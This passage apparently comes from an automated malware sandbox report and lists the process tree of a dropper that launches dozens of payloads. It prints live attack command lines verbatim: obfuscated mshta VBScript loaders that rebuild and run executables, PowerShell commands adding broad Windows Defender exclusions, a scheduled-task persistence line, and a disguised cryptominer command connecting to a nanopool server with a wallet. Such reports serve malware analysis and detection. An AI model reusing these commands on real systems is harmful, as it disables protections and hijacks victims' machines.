        "C:\Users\Admin\Pictures\Adobe Films\Vw2nv7Z1PkJS2CxGERjVqIZH.exe"
        6⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\is-Q4446.tmp\Vw2nv7Z1PkJS2CxGERjVqIZH.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q4446.tmp\Vw2nv7Z1PkJS2CxGERjVqIZH.tmp" /SL5="$B023C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Vw2nv7Z1PkJS2CxGERjVqIZH.exe"
        7⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\is-O8RC1.tmp\lakazet.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-O8RC1.tmp\lakazet.exe" /S /UID=2709
        8⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\ba-ce4db-20b-e07aa-f734ea801ac21\Xizhyqowyku.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ba-ce4db-20b-e07aa-f734ea801ac21\Xizhyqowyku.exe"
        9⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\c7-3bc1c-025-15aa9-f492c457d9fa1\Tyjegifoce.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c7-3bc1c-025-15aa9-f492c457d9fa1\Tyjegifoce.exe"
        9⤵
        
        PID:2920
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gc4rbvxb.zxu\installer.exe /qn CAMPAIGN="654" & exit
        10⤵
        
        PID:10576
        
        C:\Users\Admin\AppData\Local\Temp\gc4rbvxb.zxu\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\gc4rbvxb.zxu\installer.exe /qn CAMPAIGN="654"
        11⤵
        
        PID:9832
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4nxjh2w.zzp\any.exe & exit
        10⤵
        
        PID:12968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5se2ik23.iv5\autosubplayer.exe /S & exit
        10⤵
        
        PID:13128
        
        C:\Users\Admin\AppData\Local\Temp\5se2ik23.iv5\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\5se2ik23.iv5\autosubplayer.exe /S
        11⤵
        
        PID:9840
        
        C:\Program Files\Windows Defender Advanced Threat Protection\ESYCMUPIXM\foldershare.exe
        
        "C:\Program Files\Windows Defender Advanced Threat Protection\ESYCMUPIXM\foldershare.exe" /VERYSILENT
        9⤵
        
        PID:6348
      - C:\Users\Admin\Pictures\Adobe Films\O0ObZ3cMh9E6MiMOyZz8CvCX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\O0ObZ3cMh9E6MiMOyZz8CvCX.exe"
        6⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        7⤵
        
        PID:988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0768bf0e01cf08ac5.exe
      4⤵
      PID:2156
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe
        
        Sun0768bf0e01cf08ac5.exe
        5⤵
        Executes dropped EXE
        
        PID:2532
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ("cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If """" == """" for %t in (""C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe"") do taskkill -im ""%~NXt"" -f ", 0, tRuE ) )
        6⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi &If "" == "" for %t in ("C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0768bf0e01cf08ac5.exe") do taskkill -im "%~NXt" -f
        7⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe
        
        ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi
        8⤵
        Executes dropped EXE
        
        PID:5188
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ("cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If ""-PhymCZvLUAWi "" == """" for %t in (""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"") do taskkill -im ""%~NXt"" -f ", 0, tRuE ) )
        9⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi &If "-PhymCZvLUAWi " == "" for %t in ("C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe") do taskkill -im "%~NXt" -f
        10⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbSCRipt:cloSe ( CREaTeObJecT( "WscrIPT.sHELL" ).RUN("Cmd /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = ""MZ"" > cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To + eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q * " ,0 ,true) )
        9⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF &ecHo | sET /P = "MZ" >cxQOi7.xVE&cOPy /y /b CxQOI7.xVE+ W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To+ eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q *
        10⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ecHo "
        11⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>cxQOi7.xVE"
        11⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\TSiZ8.~
        11⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\TSiZ8.~
        12⤵
        
        PID:5604
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\TSiZ8.~
        13⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\TSiZ8.~
        14⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "Sun0768bf0e01cf08ac5.exe" -f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0746b3c4631.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3168
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0746b3c4631.exe
        
        Sun0746b3c4631.exe
        5⤵
        Executes dropped EXE
        
        PID:1340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07e5c589dd5d.exe
      4⤵
      PID:2808
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e5c589dd5d.exe
        
        Sun07e5c589dd5d.exe
        5⤵
        Executes dropped EXE
        
        PID:2268
      - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e5c589dd5d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e5c589dd5d.exe" -u
        6⤵
        Executes dropped EXE
        
        PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun075d5a7849d7670a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun075d5a7849d7670a.exe
        
        Sun075d5a7849d7670a.exe
        5⤵
        Executes dropped EXE
        
        PID:4352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07e840e6fb5.exe
      4⤵
      PID:3420
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe
        
        Sun07e840e6fb5.exe
        5⤵
        Executes dropped EXE
        
        PID:2060
      - C:\Users\Admin\AppData\Local\Temp\is-5JUPP.tmp\Sun07e840e6fb5.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5JUPP.tmp\Sun07e840e6fb5.tmp" /SL5="$801E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe" /SILENT
        7⤵
        Executes dropped EXE
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\is-NLSMR.tmp\Sun07e840e6fb5.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NLSMR.tmp\Sun07e840e6fb5.tmp" /SL5="$901E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07e840e6fb5.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\is-J6VU2.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-J6VU2.tmp\postback.exe" ss1
        9⤵
        
        PID:1528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun073980a935.exe
      4⤵
      PID:3980
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun073980a935.exe
        
        Sun073980a935.exe
        5⤵
        Executes dropped EXE
        
        PID:4984
      - C:\Users\Admin\Pictures\Adobe Films\7F9Pq9Hae1NhAZoTrmUMaZp4.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7F9Pq9Hae1NhAZoTrmUMaZp4.exe"
        6⤵
        
        PID:1032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun078a90701e.exe
      4⤵
      PID:3764
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun078a90701e.exe
        
        Sun078a90701e.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3792
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5872
        
        C:\Users\Admin\AppData\Roaming\1123065.exe
        
        "C:\Users\Admin\AppData\Roaming\1123065.exe"
        8⤵
        
        PID:1280
        
        C:\Users\Admin\AppData\Roaming\8907666.exe
        
        "C:\Users\Admin\AppData\Roaming\8907666.exe"
        8⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Roaming\5781124.exe
        
        "C:\Users\Admin\AppData\Roaming\5781124.exe"
        8⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Roaming\5948261.exe
        
        "C:\Users\Admin\AppData\Roaming\5948261.exe"
        8⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Roaming\2291823.exe
        
        "C:\Users\Admin\AppData\Roaming\2291823.exe"
        8⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Roaming\4958604.exe
        
        "C:\Users\Admin\AppData\Roaming\4958604.exe"
        8⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\4958604.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\4958604.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        9⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\4958604.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\4958604.exe" ) do taskkill -F -IM "%~Nxv"
        10⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -IM "4958604.exe"
        11⤵
        Kills process with taskkill
        
        PID:2800
        
        C:\Users\Admin\AppData\Roaming\7341621.exe
        
        "C:\Users\Admin\AppData\Roaming\7341621.exe"
        8⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
        7⤵
        Executes dropped EXE
        
        PID:5984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 308
        8⤵
        Program crash
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        Executes dropped EXE
        
        PID:6048
        
        C:\Users\Admin\AppData\Local\Temp\chrome.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6132
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6132 -s 1712
        8⤵
        Program crash
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\chrome update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5280
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5280 -s 1724
        8⤵
        Program crash
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\chrome1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
        7⤵
        Executes dropped EXE
        
        PID:4820
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4820 -s 1724
        8⤵
        Program crash
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"
        7⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        8⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
        9⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        7⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\chrome3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
        7⤵
        
        PID:5304
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5304 -s 2224
        8⤵
        Program crash
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        
        PID:2908
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:3792
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        9⤵
        
        PID:5720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        10⤵
        
        PID:5516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        10⤵
        
        PID:7156
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        9⤵
        
        PID:4060
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        10⤵
        Creates scheduled task(s)
        
        PID:2868
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        9⤵
        
        PID:5272
        
        C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        10⤵
        
        PID:2032
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        11⤵
        
        PID:3056
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        12⤵
        
        PID:4332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        13⤵
        
        PID:4968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        13⤵
        
        PID:1124
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        12⤵
        
        PID:3332
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        13⤵
        
        PID:3420
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        12⤵
        
        PID:4888
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07a9799f68e7.exe /mixtwo
      4⤵
      PID:4868
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07a9799f68e7.exe
        
        Sun07a9799f68e7.exe /mixtwo
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3192
      - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07a9799f68e7.exe
        
        Sun07a9799f68e7.exe /mixtwo
        6⤵
        Executes dropped EXE
        
        PID:4512
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun07a9799f68e7.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07a9799f68e7.exe" & exit
        7⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Sun07a9799f68e7.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:6092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07d7bdaf7c.exe
      4⤵
      PID:2852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07d46efb4bd1.exe
      4⤵
      PID:1068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07610e6b216b74271.exe
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07bb82f51727fc79.exe
      4⤵
      PID:4280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07923b89b57.exe
      4⤵
      PID:2208

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07923b89b57.exe
Sun07923b89b57.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2284
- C:\Users\Admin\AppData\Roaming\1522257.exe
  "C:\Users\Admin\AppData\Roaming\1522257.exe"
  2⤵
  - Executes dropped EXE
  PID:2568
- C:\Users\Admin\AppData\Roaming\5473224.exe
  "C:\Users\Admin\AppData\Roaming\5473224.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5148
- - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    3⤵
    PID:5920
- C:\Users\Admin\AppData\Roaming\2375662.exe
  "C:\Users\Admin\AppData\Roaming\2375662.exe"
  2⤵
  PID:5308
- C:\Users\Admin\AppData\Roaming\4699309.exe
  "C:\Users\Admin\AppData\Roaming\4699309.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:5768
- C:\Users\Admin\AppData\Roaming\8150769.exe
  "C:\Users\Admin\AppData\Roaming\8150769.exe"
  2⤵
  - Executes dropped EXE
  PID:4492
- C:\Users\Admin\AppData\Roaming\1768884.exe
  "C:\Users\Admin\AppData\Roaming\1768884.exe"
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\1768884.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\1768884.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
    3⤵
    PID:5332
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\1768884.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\1768884.exe" ) do taskkill -F -IM "%~Nxv"
      4⤵
      PID:5616
    - - C:\Users\Admin\AppData\Local\Temp\Qw5u.exe
        
        Qw5U.Exe -PmowtdFUhhnCoUk
        5⤵
        
        PID:2232
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk ""== """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        6⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "-PmowtdFUhhnCoUk "== "" for %v In ("C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" ) do taskkill -F -IM "%~Nxv"
        7⤵
        
        PID:6096
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIPt:CloSE( cREateOBJecT ( "WscRipt.SHeLl").Run("CMD /Q /C ECHO | sEt /P = ""MZ"" > IEEeXE.7YX & CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ ",0,tRUE) )
        6⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C ECHO | sEt /P = "MZ" > IEEeXE.7YX&CoPY /b /Y IEEeXE.7YX+WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ
        7⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>IEEeXE.7YX"
        8⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
        8⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\control.exe
        
        control.exe .\B0M3YFV5.lRJ
        8⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ
        9⤵
        
        PID:5664
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ
        10⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\B0M3YFV5.lRJ
        11⤵
        
        PID:4716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -IM "1768884.exe"
        5⤵
        Kills process with taskkill
        
        PID:3856
- C:\Users\Admin\AppData\Roaming\298642.exe
  "C:\Users\Admin\AppData\Roaming\298642.exe"
  2⤵
  PID:5904

C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07d7bdaf7c.exe
Sun07d7bdaf7c.exe
1⤵
- Executes dropped EXE
PID:4556
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 300
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4044

C:\Users\Admin\AppData\Local\Temp\is-DJSJI.tmp\Sun0746b3c4631.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DJSJI.tmp\Sun0746b3c4631.tmp" /SL5="$3017A,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun0746b3c4631.exe"
1⤵
- Executes dropped EXE
